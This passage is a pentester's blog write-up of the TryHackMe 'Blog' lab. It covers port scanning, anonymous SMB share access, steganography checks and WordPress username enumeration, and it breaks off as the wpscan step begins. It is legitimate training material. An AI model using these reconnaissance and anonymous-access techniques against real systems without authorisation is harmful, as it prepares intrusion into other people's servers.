<!doctype html>














<!-- `site.alt_lang` can specify a language different from the UI -->
<html lang="en" >
  <head>
  <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
  <meta name="theme-color" media="(prefers-color-scheme: light)" content="#f7f7f7">
  <meta name="theme-color" media="(prefers-color-scheme: dark)" content="#1b1b1e">
  <meta name="mobile-web-app-capable" content="yes">
  <meta name="apple-mobile-web-app-status-bar-style" content="black-translucent">
  <meta
    name="viewport"
    content="width=device-width, user-scalable=no initial-scale=1, shrink-to-fit=no, viewport-fit=cover"
  ><!-- Setup Open Graph image -->

  

  <!-- Begin Jekyll SEO tag v2.8.0 -->
<meta name="generator" content="Jekyll v4.3.4" />
<meta property="og:title" content="Blog" />
<meta name="author" content="Anas" />
<meta property="og:locale" content="en" />
<meta name="description" content="Billy Joel made a Wordpress blog!" />
<meta property="og:description" content="Billy Joel made a Wordpress blog!" />
<link rel="canonical" href="http://localhost:4000/posts/thm-blog/" />
<meta property="og:url" content="http://localhost:4000/posts/thm-blog/" />
<meta property="og:site_name" content="NullBrunk" />
<meta property="og:image" content="http://localhost:4000/assets/img/writeups/thm/blog/blog_main.png" />
<meta property="og:type" content="article" />
<meta property="article:published_time" content="2024-12-28T16:00:00+00:00" />
<meta name="twitter:card" content="summary_large_image" />
<meta property="twitter:image" content="http://localhost:4000/assets/img/writeups/thm/blog/blog_main.png" />
<meta property="twitter:title" content="Blog" />
<script type="application/ld+json">
{"@context":"https://schema.org","@type":"BlogPosting","author":{"@type":"Person","name":"Anas","url":"https://github.com/NullBrunk/"},"dateModified":"2025-01-02T19:29:42+00:00","datePublished":"2024-12-28T16:00:00+00:00","description":"Billy Joel made a Wordpress blog!","headline":"Blog","image":"http://localhost:4000/assets/img/writeups/thm/blog/blog_main.png","mainEntityOfPage":{"@type":"WebPage","@id":"http://localhost:4000/posts/thm-blog/"},"url":"http://localhost:4000/posts/thm-blog/"}</script>
<!-- End Jekyll SEO tag -->


  <title>Blog | NullBrunk
  </title>

  <!--
  The Favicons for Web, Android, Microsoft, and iOS (iPhone and iPad) Apps
  Generated by: https://realfavicongenerator.net/
-->



<link rel="apple-touch-icon" sizes="180x180" href="/assets/img/favicons/apple-touch-icon.png">
<link rel="icon" type="image/png" sizes="32x32" href="/assets/img/favicons/favicon-32x32.png">
<link rel="icon" type="image/png" sizes="16x16" href="/assets/img/favicons/favicon-16x16.png">

  <link rel="manifest" href="/assets/img/favicons/site.webmanifest">

<link rel="shortcut icon" href="/assets/img/favicons/favicon.ico">
<meta name="apple-mobile-web-app-title" content="NullBrunk">
<meta name="application-name" content="NullBrunk">
<meta name="msapplication-TileColor" content="#da532c">
<meta name="msapplication-config" content="/assets/img/favicons/browserconfig.xml">
<meta name="theme-color" content="#ffffff">


  <!-- Resource Hints -->
  
    
      
        <link rel="preconnect" href="https://fonts.googleapis.com" >
      
        <link rel="dns-prefetch" href="https://fonts.googleapis.com" >
      
    
      
        <link rel="preconnect" href="https://fonts.gstatic.com" crossorigin>
      
        <link rel="dns-prefetch" href="https://fonts.gstatic.com" >
      
    
      
        <link rel="preconnect" href="https://cdn.jsdelivr.net" >
      
        <link rel="dns-prefetch" href="https://cdn.jsdelivr.net" >
      
    
  

  <!-- Bootstrap -->
  
    <link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/bootstrap@5.3.3/dist/css/bootstrap.min.css">
  

  <!-- Theme style -->
  <link rel="stylesheet" href="/assets/css/jekyll-theme-chirpy.css">

  <!-- Web Font -->
  <link rel="stylesheet" href="https://fonts.googleapis.com/css2?family=Lato:wght@300;400&family=Source+Sans+Pro:wght@400;600;700;900&display=swap">

  <!-- Font Awesome Icons -->
  <link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/@fortawesome/fontawesome-free@6.7.1/css/all.min.css">

  <!-- 3rd-party Dependencies -->

  
    <link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/tocbot@4.32.2/dist/tocbot.min.css">
  

  
    <link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/loading-attribute-polyfill@2.1.1/dist/loading-attribute-polyfill.min.css">
  

  
    <!-- Image Popup -->
    <link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/glightbox@3.3.0/dist/css/glightbox.min.css">
  

  <!-- Scripts -->

  <script src="/assets/js/dist/theme.min.js"></script>

  <!-- JS selector for site. -->

<!-- commons -->



<!-- layout specified -->


  

  
    <!-- image lazy-loading & popup & clipboard -->
    
  















  
    

    

  

  
    

    

  

  
    

    

  

  
    

    

  

  
    

    

  

  
    

    

  

  
    

    

  

  
    

    

  

  
    

    

  



  <script defer src="https://cdn.jsdelivr.net/combine/npm/simple-jekyll-search@1.10.0/dest/simple-jekyll-search.min.js,npm/loading-attribute-polyfill@2.1.1/dist/loading-attribute-polyfill.umd.min.js,npm/glightbox@3.3.0/dist/js/glightbox.min.js,npm/clipboard@2.0.11/dist/clipboard.min.js,npm/dayjs@1.11.13/dayjs.min.js,npm/dayjs@1.11.13/locale/en.js,npm/dayjs@1.11.13/plugin/relativeTime.js,npm/dayjs@1.11.13/plugin/localizedFormat.js,npm/tocbot@4.32.2/dist/tocbot.min.js"></script>







<script defer src="/assets/js/dist/post.min.js"></script>



<!-- Pageviews -->

  

  



  

  <!-- A placeholder to allow defining custom metadata -->

</head>


  <body>
    <!-- The Side Bar -->

<aside aria-label="Sidebar" id="sidebar" class="d-flex flex-column align-items-end">
  <header class="profile-wrapper">
    <a href="/" id="avatar" class="rounded-circle"><img src="/assets/img/favicons/logo.png" width="112" height="112" alt="avatar" onerror="this.style.display='none'"></a>

    <a class="site-title d-block" href="/">NullBrunk</a>
    <p class="site-subtitle fst-italic mb-0">Pentester, Developer</p>
  </header>
  <!-- .profile-wrapper -->

  <nav class="flex-column flex-grow-1 w-100 ps-0">
    <ul class="nav">
      <!-- home -->
      <li class="nav-item">
        <a href="/" class="nav-link">
          <i class="fa-fw fas fa-home"></i>
          <span>HOME</span>
        </a>
      </li>
      <!-- the real tabs -->
      
          
          <li class="nav-item">
            <a href="/tools/" class="nav-link">
              <i class="fa-fw fas fas fa-code"></i>
              

              <span>TOOLS</span>
            </a>
          </li>
        
        <!-- .nav-item -->
      
          
          <li class="nav-item">
            <a href="/prog/" class="nav-link">
              <i class="fa-fw fas fa-screwdriver-wrench"></i>
              

              <span>PROG</span>
            </a>
          </li>
        
        <!-- .nav-item -->
      
          
          <li class="nav-item">
            <a href="/tags/" class="nav-link">
              <i class="fa-fw fas fa-tags"></i>
              

              <span>TAGS</span>
            </a>
          </li>
        
        <!-- .nav-item -->
      
          
          <li class="nav-item">
            <a href="/about/" class="nav-link">
              <i class="fa-fw fas fa-info-circle"></i>
              

              <span>ABOUT</span>
            </a>
          </li>
        
        <!-- .nav-item -->
      
        
        <!-- .nav-item -->
      
    </ul>
  </nav>

  <div class="sidebar-bottom d-flex flex-wrap  align-items-center w-100">
    
      <button type="button" class="btn btn-link nav-link" aria-label="Switch Mode" id="mode-toggle">
        <i class="fas fa-adjust"></i>
      </button>

      
        <span class="icon-border"></span>
      
    

    
      

      
        <a
          href="https://github.com/nullbrunk"
          aria-label="github"
          

          
            target="_blank"
            
          

          

          
            rel="noopener noreferrer"
          
        >
          <i class="fab fa-github"></i>
        </a>
      
    
      

      
        <a
          href="https://www.root-me.org/NullBrunk?q=%2FNullbrunk"
          aria-label="root-me"
          

          

          

          
        >
          <i class="fas fa-skull"></i>
        </a>
      
    
      

      
        <a
          href="https://tryhackme.com/r/p/NullBrunk"
          aria-label="try-hack-me"
          

          

          

          
        >
          <i class="fas fa-cloud"></i>
        </a>
      
    
      

      
        <a
          href="https://www.linkedin.com/in/anas-idiri-b05733229"
          aria-label="linkedin"
          

          
            target="_blank"
            
          

          

          
            rel="noopener noreferrer"
          
        >
          <i class="fab fa-linkedin"></i>
        </a>
      
    
  </div>
  <!-- .sidebar-bottom -->
</aside>
<!-- #sidebar -->


    <div id="main-wrapper" class="d-flex justify-content-center">
      <div class="container d-flex flex-column px-xxl-5">
        <!--  include topbar.html lang=lang -->

        <div class="row flex-grow-1">
          <main aria-label="Main Content" class="col-12 col-lg-11 col-xl-9 px-md-4">
            
              <!-- Refactor the HTML structure -->



<!--
  In order to allow a wide table to scroll horizontally,
  we suround the markdown table with `<div class="table-wrapper">` and `</div>`
-->



<!--
  Fixed kramdown code highlight rendering:
  https://github.com/penibelst/jekyll-compress-html/issues/101
  https://github.com/penibelst/jekyll-compress-html/issues/71#issuecomment-188144901
-->



<!-- Change the icon of checkbox -->



<!-- Handle images -->




  
  

  
    
      
      
    

    
    

    

    
    

    
    
    

    
      

      
      
      

      
    
      

      
      
      

      
    
      

      
      
      

      
    
      

      
      
      

      
    
      

      
      
      

      
    

    <!-- take out classes -->
    

    
    

    

    
      
    

    <!-- lazy-load images -->
    

    
      <!-- make sure the `<img>` is wrapped by `<a>` -->
      

      
        <!-- create the image wrapper -->
        

        
        
      
    

    <!-- combine -->
    
  
    

    
    

    

    
    

    
    
    

    
      

      
      
      

      
    
      

      
      
      

      
    
      

      
      
      

      
    

    <!-- take out classes -->
    

    
    

    

    
      
    

    <!-- lazy-load images -->
    

    
      <!-- make sure the `<img>` is wrapped by `<a>` -->
      

      
        <!-- create the image wrapper -->
        

        
        
      
    

    <!-- combine -->
    
  
    

    
    

    

    
    

    
    
    

    
      

      
      
      

      
    
      

      
      
      

      
    
      

      
      
      

      
    

    <!-- take out classes -->
    

    
    

    

    
      
    

    <!-- lazy-load images -->
    

    
      <!-- make sure the `<img>` is wrapped by `<a>` -->
      

      
        <!-- create the image wrapper -->
        

        
        
      
    

    <!-- combine -->
    
  
    

    
    

    

    
    

    
    
    

    
      

      
      
      

      
    
      

      
      
      

      
    
      

      
      
      

      
    

    <!-- take out classes -->
    

    
    

    

    
      
    

    <!-- lazy-load images -->
    

    
      <!-- make sure the `<img>` is wrapped by `<a>` -->
      

      
        <!-- create the image wrapper -->
        

        
        
      
    

    <!-- combine -->
    
  
    

    
    

    

    
    

    
    
    

    
      

      
      
      

      
    

    <!-- take out classes -->
    

    
    

    

    
      
    

    <!-- lazy-load images -->
    

    
      <!-- make sure the `<img>` is wrapped by `<a>` -->
      

      
        <!-- create the image wrapper -->
        

        
        
      
    

    <!-- combine -->
    
  
    

    
    

    

    
    

    
    
    

    
      

      
      
      

      
    

    <!-- take out classes -->
    

    
    

    

    
      
    

    <!-- lazy-load images -->
    

    
      <!-- make sure the `<img>` is wrapped by `<a>` -->
      

      
        <!-- create the image wrapper -->
        

        
        
      
    

    <!-- combine -->
    
  
    

    
    

    

    
    

    
    
    

    
      

      
      
      

      
    
      

      
      
      

      
    
      

      
      
      

      
    

    <!-- take out classes -->
    

    
    

    

    
      
    

    <!-- lazy-load images -->
    

    
      <!-- make sure the `<img>` is wrapped by `<a>` -->
      

      
        <!-- create the image wrapper -->
        

        
        
      
    

    <!-- combine -->
    
  
    

    
    

    

    
    

    
    
    

    
      

      
      
      

      
    
      

      
      
      

      
    
      

      
      
      

      
    

    <!-- take out classes -->
    

    
    

    

    
      
    

    <!-- lazy-load images -->
    

    
      <!-- make sure the `<img>` is wrapped by `<a>` -->
      

      
        <!-- create the image wrapper -->
        

        
        
      
    

    <!-- combine -->
    
  
    

    
    

    

    
    

    
    
    

    
      

      
      
      

      
    
      

      
      
      

      
    
      

      
      
      

      
    

    <!-- take out classes -->
    

    
    

    

    
      
    

    <!-- lazy-load images -->
    

    
      <!-- make sure the `<img>` is wrapped by `<a>` -->
      

      
        <!-- create the image wrapper -->
        

        
        
      
    

    <!-- combine -->
    
  
    

    
    

    

    
    

    
    
    

    
      

      
      
      

      
    
      

      
      
      

      
    
      

      
      
      

      
    

    <!-- take out classes -->
    

    
    

    

    
      
    

    <!-- lazy-load images -->
    

    
      <!-- make sure the `<img>` is wrapped by `<a>` -->
      

      
        <!-- create the image wrapper -->
        

        
        
      
    

    <!-- combine -->
    
  
    

    
    

    

    
    

    
    
    

    
      

      
      
      

      
    
      

      
      
      

      
    
      

      
      
      

      
    

    <!-- take out classes -->
    

    
    

    

    
      
    

    <!-- lazy-load images -->
    

    
      <!-- make sure the `<img>` is wrapped by `<a>` -->
      

      
        <!-- create the image wrapper -->
        

        
        
      
    

    <!-- combine -->
    
  
    

    
    

    

    
    

    
    
    

    
      

      
      
      

      
    
      

      
      
      

      
    
      

      
      
      

      
    

    <!-- take out classes -->
    

    
    

    

    
      
    

    <!-- lazy-load images -->
    

    
      <!-- make sure the `<img>` is wrapped by `<a>` -->
      

      
        <!-- create the image wrapper -->
        

        
        
      
    

    <!-- combine -->
    
  
    

    
    

    

    
    

    
    
    

    
      

      
      
      

      
    
      

      
      
      

      
    
      

      
      
      

      
    

    <!-- take out classes -->
    

    
    

    

    
      
    

    <!-- lazy-load images -->
    

    
      <!-- make sure the `<img>` is wrapped by `<a>` -->
      

      
        <!-- create the image wrapper -->
        

        
        
      
    

    <!-- combine -->
    
  
    

    
    

    

    
    

    
    
    

    
      

      
      
      

      
    
      

      
      
      

      
    
      

      
      
      

      
    

    <!-- take out classes -->
    

    
    

    

    
      
    

    <!-- lazy-load images -->
    

    
      <!-- make sure the `<img>` is wrapped by `<a>` -->
      

      
        <!-- create the image wrapper -->
        

        
        
      
    

    <!-- combine -->
    
  
    

    
    

    

    
    

    
    
    

    
      

      
      
      

      
    
      

      
      
      

      
    
      

      
      
      

      
    

    <!-- take out classes -->
    

    
    

    

    
      
    

    <!-- lazy-load images -->
    

    
      <!-- make sure the `<img>` is wrapped by `<a>` -->
      

      
        <!-- create the image wrapper -->
        

        
        
      
    

    <!-- combine -->
    
  
    

    
    

    

    
    

    
    
    

    
      

      
      
      

      
    
      

      
      
      

      
    
      

      
      
      

      
    

    <!-- take out classes -->
    

    
    

    

    
      
    

    <!-- lazy-load images -->
    

    
      <!-- make sure the `<img>` is wrapped by `<a>` -->
      

      
        <!-- create the image wrapper -->
        

        
        
      
    

    <!-- combine -->
    
  
    

    
    

    

    
    

    
    
    

    
      

      
      
      

      
    
      

      
      
      

      
    
      

      
      
      

      
    

    <!-- take out classes -->
    

    
    

    

    
      
    

    <!-- lazy-load images -->
    

    
      <!-- make sure the `<img>` is wrapped by `<a>` -->
      

      
        <!-- create the image wrapper -->
        

        
        
      
    

    <!-- combine -->
    
  

  


<!-- Add header for code snippets -->



<!-- Create heading anchors -->





  
  

  
    
    

    
      
        
        
      

      
      

      
      
      

      
    
      

      
      

      
      
      

      
    
      

      
      

      
      
      

      
    
      

      
      

      
      
      

      
    
      

      
      

      
      
      

      
    
      

      
      

      
      
      

      
    
      

      
      

      
      
      

      
    
      

      
      

      
      
      

      
    
      

      
      

      
      
      

      
    
      

      
      

      
      
      

      
    
      

      
      

      
      
      

      
    
      

      
      

      
      
      

      
    

    
  

  
  

  
    
    

    
      
        
        
      

      
      

      
      
      

      
    
      

      
      

      
      
      

      
    

    
  

  
  

  

  
  

  




<!-- return -->










<header id="topbar-wrapper" aria-label="Top Bar">
    <div id="topbar" class="d-flex align-items-center justify-content-between h-100" >
        <nav id="breadcrumb" aria-label="Breadcrumb">
            <span><a href="/">Home</a></span>
             

            
                <span>
                 <a href="/categories/writeups/">Writeups</a>
                </span>
            
                <span>
                 <a href="/categories/tryhackme/">TryHackMe</a>
                </span>
            

             
             
            

            
             
            
            <span>Blog</span>
        </nav>
    </div>
</header>

<article class="px-1" data-toc="true">
  <header>
    <h1 data-toc-skip>Blog</h1>
    
      <p class="post-desc fw-light mb-4">Billy Joel made a Wordpress blog!</p>
    

    <div class="post-meta text-muted">
      <!-- published date -->
      <span>
        Posted
        <!--
  Date format snippet
  See: ${JS_ROOT}/utils/locale-dateime.js
-->




<time
  
  data-ts="1735401600"
  data-df="ll"
  
    data-bs-toggle="tooltip" data-bs-placement="bottom"
  
>
  Dec 28, 2024
</time>

      </span>

      <!-- lastmod date -->
      
        <span>
          Updated
          <!--
  Date format snippet
  See: ${JS_ROOT}/utils/locale-dateime.js
-->




<time
  
  data-ts="1735846182"
  data-df="ll"
  
    data-bs-toggle="tooltip" data-bs-placement="bottom"
  
>
  Jan  2, 2025
</time>

        </span>
      

      
        
        
        

        

        <div class="mt-3 mb-3">
          <a href="/assets/img/writeups/thm/blog/blog_main.png" class="popup img-link preview-img shimmer"><img src="/assets/img/writeups/thm/blog/blog_main.png"  alt="Preview Image" width="1200" height="630"  loading="lazy"></a></div>
      

      <div class="d-flex justify-content-between">
        <!-- author(s) -->
        <span>
          

          By

          <em>
            
              
                <a href="https://github.com/NullBrunk/">Anas</a>
                
              
            
          </em>
        </span>

        <div>
          <!-- pageviews -->
          

          <!-- read time -->
          <!-- Calculate the post's reading time, and display the word count in tooltip -->



<!-- words per minute -->










<!-- return element -->
<span
  class="readtime"
  data-bs-toggle="tooltip"
  data-bs-placement="bottom"
  title="1629 words"
>
  <em>9 min</em> read</span>

        </div>
      </div>
    </div>
  </header>

  
    <div id="toc-bar" class="d-flex align-items-center justify-content-between invisible">
      <span class="label text-truncate">Blog</span>
      <button type="button" class="toc-trigger btn me-1">
        <i class="fa-solid fa-list-ul fa-fw"></i>
      </button>
    </div>

    <button id="toc-solo-trigger" type="button" class="toc-trigger btn btn-outline-secondary btn-sm">
      <span class="label ps-2 pe-1">Contents</span>
      <i class="fa-solid fa-angle-right fa-fw"></i>
    </button>

    <dialog id="toc-popup" class="p-0">
      <div class="header d-flex flex-row align-items-center justify-content-between">
        <div class="label text-truncate py-2 ms-4">Blog</div>
        <button id="toc-popup-close" type="button" class="btn mx-1 my-1 opacity-75">
          <i class="fas fa-close"></i>
        </button>
      </div>
      <div id="toc-popup-content" class="px-4 py-3 pb-4"></div>
    </dialog>
  

  <div class="content">
    <h1 id="introduction">Introduction</h1>

<p>Hello everyone, today we will be taking a look at <a href="https://tryhackme.com/r/room/blog">Blog</a>, a <span class="medium">Medium</span> rated room on <a href="https://tryhackme.com/">TryHackMe</a>. We will explore the exploitation of a vulnerable Wordpress website with wpscan and metasploit, before moving on to the privilege escalation phase using tools like pwncat, LinPEAS and ltrace. Let’s get started !</p>

<ol>
  <li>Enumeration
    <ul>
      <li><a href="#portscan">Portscan</a></li>
      <li><a href="#smb-139-445">SMB (139,445)</a></li>
      <li><a href="#http-80">HTTP (80)</a>
        <ul>
          <li><a href="#manual-enumeration">Manual enumeration</a></li>
          <li><a href="#wpscan">Wpscan</a></li>
        </ul>
      </li>
      <li><a href="#searchsploit">Searchsploit</a></li>
    </ul>
  </li>
  <li>Exploitation
    <ul>
      <li><a href="#testing-searchsploit-exploits">Testing searchsploit exploit</a></li>
      <li><a href="#bruteforcing-wordpress">Bruteforcing WordPress</a></li>
      <li><a href="#getting-rce">Getting RCE</a></li>
    </ul>
  </li>
  <li>Privesc
    <ul>
      <li><a href="#pwncat">Pwncat</a></li>
      <li><a href="#user-flag--or-not">User flag … or not</a></li>
      <li><a href="#manual-enumeration-1">Manual enumeration</a></li>
      <li><a href="#linpeas">Linpeas</a></li>
      <li><a href="#suid-binary">SUID Binary</a></li>
    </ul>
  </li>
</ol>

<hr />

<p><br /></p>

<h1 id="enumeration">Enumeration</h1>
<h2 id="portscan"><span class="me-2">Portscan</span><a href="#portscan" class="anchor text-muted"><i class="fas fa-hashtag"></i></a></h2>
<p>First the room asks us to map the <code class="language-plaintext highlighter-rouge">blog.thm</code> domain name to the <code class="language-plaintext highlighter-rouge">$TARGET_IP</code> in /etc/hosts, so I started by doing that.</p>

<p>As always, I like to begin with a port scan. For this I use <a href="https://github.com/RustScan/RustScan">rustscan</a>. It’s basically a Rust-based port scanner that detects open ports, and then launches an nmap scan only on the discovered ports. You can specify options to the subsequent nmap scan by using the <code class="language-plaintext highlighter-rouge">-- NMAP_OPTIONS</code> syntax. I like to go with <code class="language-plaintext highlighter-rouge">-sV</code> for identification of services version, and <code class="language-plaintext highlighter-rouge">-oN ports</code> to save the result to a file named <code class="language-plaintext highlighter-rouge">all_ports.txt</code>.</p>

<div class="language-bash highlighter-rouge"><div class="code-header">
        <span data-label-text="Shell"><i class="fas fa-code fa-fw small"></i></span>
      <button aria-label="copy" data-title-succeed="Copied!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
</pre></td><td class="rouge-code"><pre>rustscan <span class="nt">-a</span> <span class="nv">$TARGET_IP</span> <span class="nt">--</span> <span class="nt">-sV</span> <span class="nt">-oN</span> all_ports.txt
</pre></td></tr></tbody></table></code></div></div>
<div file="all_ports.txt" class="language-bash highlighter-rouge"><div class="code-header">
        <span data-label-text="all_ports.txt"><i class="far fa-file-code fa-fw"></i></span>
      <button aria-label="copy" data-title-succeed="Copied!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
</pre></td><td class="rouge-code"><pre>PORT    STATE SERVICE     REASON  VERSION
22/tcp  open  ssh         syn-ack OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 <span class="o">(</span>Ubuntu Linux<span class="p">;</span> protocol 2.0<span class="o">)</span>
80/tcp  open  http        syn-ack Apache httpd 2.4.29 <span class="o">((</span>Ubuntu<span class="o">))</span>
139/tcp open  netbios-ssn syn-ack Samba smbd 3.X - 4.X <span class="o">(</span>workgroup: WORKGROUP<span class="o">)</span>
445/tcp open  netbios-ssn syn-ack Samba smbd 3.X - 4.X <span class="o">(</span>workgroup: WORKGROUP<span class="o">)</span>
Service Info: Host: BLOG<span class="p">;</span> OS: Linux<span class="p">;</span> CPE: cpe:/o:linux:linux_kernel
</pre></td></tr></tbody></table></code></div></div>

<p><br />
<strong>What do we learn from this portscan ?</strong></p>
<ul>
  <li>The target is a Linux system</li>
  <li>SSH, HTTP and SMB are running</li>
</ul>

<h2 id="smb-139-445"><span class="me-2">SMB (139, 445)</span><a href="#smb-139-445" class="anchor text-muted"><i class="fas fa-hashtag"></i></a></h2>
<p>I always start by enumerating SMB because it’s relatively quick and we often find juicy files. So I started with an <a href="https://www.kali.org/tools/samba/#smbclient">smbclient</a>:</p>
<div class="language-bash highlighter-rouge"><div class="code-header">
        <span data-label-text="Shell"><i class="fas fa-code fa-fw small"></i></span>
      <button aria-label="copy" data-title-succeed="Copied!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
7
</pre></td><td class="rouge-code"><pre>┌──<span class="o">(</span>kali㉿kali<span class="o">)</span>-[~]
└─<span class="nv">$ </span>smbclient <span class="nt">-L</span> <span class="s2">"//</span><span class="nv">$TARGET_IP</span><span class="s2">"</span> <span class="nt">-U</span> <span class="s2">"%"</span>
	Sharename       Type      Comment
	<span class="nt">---------</span>       <span class="nt">----</span>      <span class="nt">-------</span>
	print<span class="nv">$ </span>         Disk      Printer Drivers
	BillySMB        Disk      Billy<span class="s1">'s local SMB Share
	IPC$            IPC       IPC Service (blog server (Samba, Ubuntu))
</span></pre></td></tr></tbody></table></code></div></div>

<p>When using smbclient, you can specify a username and a password with the following syntax: <code class="language-plaintext highlighter-rouge">-U "username%password"</code>. So <code class="language-plaintext highlighter-rouge">-U "%"</code> essentially means blank username, blank password.</p>

<div class="table-wrapper"><table>
  <thead>
    <tr>
      <th style="text-align: left">Share name</th>
      <th style="text-align: left">Description</th>
      <th style="text-align: left">Default share ?</th>
    </tr>
  </thead>
  <tbody>
    <tr>
      <td style="text-align: left">ADMIN$</td>
      <td style="text-align: left">Store printer drivers and related files</td>
      <td style="text-align: left">Yes</td>
    </tr>
    <tr>
      <td style="text-align: left">BillySMB</td>
      <td style="text-align: left"> </td>
      <td style="text-align: left"><strong>No</strong></td>
    </tr>
    <tr>
      <td style="text-align: left">IPC$</td>
      <td style="text-align: left">Inter-Process Communication</td>
      <td style="text-align: left">Yes</td>
    </tr>
  </tbody>
</table></div>

<p>Let’s explore BillySMB:</p>

<div class="language-bash highlighter-rouge"><div class="code-header">
        <span data-label-text="Shell"><i class="fas fa-code fa-fw small"></i></span>
      <button aria-label="copy" data-title-succeed="Copied!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
7
8
9
10
11
12
</pre></td><td class="rouge-code"><pre>┌──<span class="o">(</span>kali㉿kali<span class="o">)</span>-[~]
└─<span class="nv">$ </span>smbclient <span class="s2">"//</span><span class="nv">$TARGET_IP</span><span class="s2">/BillySMB"</span> <span class="nt">-U</span> <span class="s2">"%"</span><span class="sb">`</span>
Try <span class="s2">"help"</span> to get a list of possible commands.
smb: <span class="se">\&gt;</span> <span class="nb">ls</span>
  <span class="nb">.</span>                                   D        0  Tue May 26 20:17:05 2020
  ..                                  D        0  Tue May 26 19:58:23 2020
  Alice-White-Rabbit.jpg              N    33378  Tue May 26 20:17:01 2020
  tswift.mp4                          N  1236733  Tue May 26 20:13:45 2020
  check-this.png                      N     3082  Tue May 26 20:13:43 2020

		15413192 blocks of size 1024. 9788764 blocks available
smb: <span class="se">\&gt;</span> mget <span class="k">*</span>
</pre></td></tr></tbody></table></code></div></div>

<p>Open thunar to get a general overview:</p>

<p><a href="/assets/img/writeups/thm/blog/all_images.png" class="popup img-link radius-shadow shimmer"><img src="/assets/img/writeups/thm/blog/all_images.png" alt="http"  loading="lazy"></a>
<em>SMB files</em></p>

<p><code class="language-plaintext highlighter-rouge">Alice-White-Rabbit.jpg</code> is a JPG file, so I want to try some steganography tricks with an empty passphrase:</p>

<div class="language-bash highlighter-rouge"><div class="code-header">
        <span data-label-text="Shell"><i class="fas fa-code fa-fw small"></i></span>
      <button aria-label="copy" data-title-succeed="Copied!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
7
8
</pre></td><td class="rouge-code"><pre>┌──<span class="o">(</span>kali㉿kali<span class="o">)</span>-[~]
└─<span class="nv">$ </span>steghide extract <span class="nt">-sf</span> Alice-White-Rabbit.jpg
Enter passphrase: 
wrote extracted data to <span class="s2">"rabbit_hole.txt"</span>

┌──<span class="o">(</span>kali㉿kali<span class="o">)</span>-[~]
└─<span class="nv">$ </span><span class="nb">cat </span>rabbit_hole.txt
You ve found yourself <span class="k">in </span>a rabbit hole, friend.
</pre></td></tr></tbody></table></code></div></div>

<p><code class="language-plaintext highlighter-rouge">check-this.png</code>  appears to be a QR code, so let’s scan it using <a href="https://www.systutorials.com/docs/linux/man/1-zbarimg/">zbarimg</a>:</p>

<div class="language-plaintext highlighter-rouge"><div class="code-header">
        <span data-label-text="Plaintext"><i class="fas fa-code fa-fw small"></i></span>
      <button aria-label="copy" data-title-succeed="Copied!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
</pre></td><td class="rouge-code"><pre>┌──(kali㉿kali)-[~]
└─$ zbarimg check-this.png 
QR-Code:https://qrgo.page.link/M6dE
scanned 1 barcode symbols from 1 images in 0 seconds
</pre></td></tr></tbody></table></code></div></div>

<p>We could enumerate further, using tools like exiftool and binwalk, tryna look at the <code class="language-plaintext highlighter-rouge">.mp4</code> file and so on, but seems like this SMB server is just a rabbit hole. I also ran <a href="https://www.kali.org/tools/enum4linux/">enum4linux</a> to double check, but nothing interesting came up. Let’s move on.</p>

<h2 id="http-80"><span class="me-2">HTTP (80)</span><a href="#http-80" class="anchor text-muted"><i class="fas fa-hashtag"></i></a></h2>
<p>You can learn more about WordPress enumeration in <a href="https://hacktricks.boitatech.com.br/pentesting/pentesting-web/wordpress">here</a>.</p>

<p><a href="/assets/img/writeups/thm/blog/wp_index.png" class="popup img-link radius-shadow shimmer"><img src="/assets/img/writeups/thm/blog/wp_index.png" alt="http"  loading="lazy"></a>
<em>Seems like WordPress is running</em></p>

<h3 id="manual-enumeration"><span class="me-2">Manual enumeration</span><a href="#manual-enumeration" class="anchor text-muted"><i class="fas fa-hashtag"></i></a></h3>
<p>As you can see on the index page, the post has been written by <code class="language-plaintext highlighter-rouge">Karen Wheeler</code>
There is a little trick that you can use to enumerate other users. Simply add <code class="language-plaintext highlighter-rouge">?author=X</code> where <code class="language-plaintext highlighter-rouge">X</code> is a number at the end of the URL:
<a href="/assets/img/writeups/thm/blog/manual_wp_enum.png" class="popup img-link radius-shadow shimmer"><img src="/assets/img/writeups/thm/blog/manual_wp_enum.png" alt="http"  loading="lazy"></a></p>

<p>I tried it with <code class="language-plaintext highlighter-rouge">X=2</code> but it returned a <strong>404 Not Found</strong>, so there are only two users on this WordPress website.</p>

<p>Let’s try to login manually. Note that we cannot login with <em>Karen Wheeler</em> or <em>Billy Joel</em> as username, we need to login with their wordpress generated usernames, the first letter of the firstname and the lastname:</p>

<div class="d-flex" style="height: 400px">
    <a href="/assets/img/writeups/thm/blog/validating_kwheel.png" class="popup img-link  shimmer"><img src="/assets/img/writeups/thm/blog/validating_kwheel.png" loading="lazy"></a>
    <a href="/assets/img/writeups/thm/blog/validating_bjoel.png" class="popup img-link  shimmer"><img src="/assets/img/writeups/thm/blog/validating_bjoel.png" loading="lazy"></a>
</div>

<h3 id="wpscan"><span class="me-2">Wpscan</span><a href="#wpscan" class="anchor text-muted"><i class="fas fa-hashtag"></i></a></h3>
<p>Here is the <a href="https://www.kali.org/tools/wpscan/">wpscan</a> with irrelevant parts removed:</p>

<div class="language-bash highlighter-rouge"><div class="code-header">
        <span data-label-text="Shell"><i class="fas fa-code fa-fw small"></i></span>
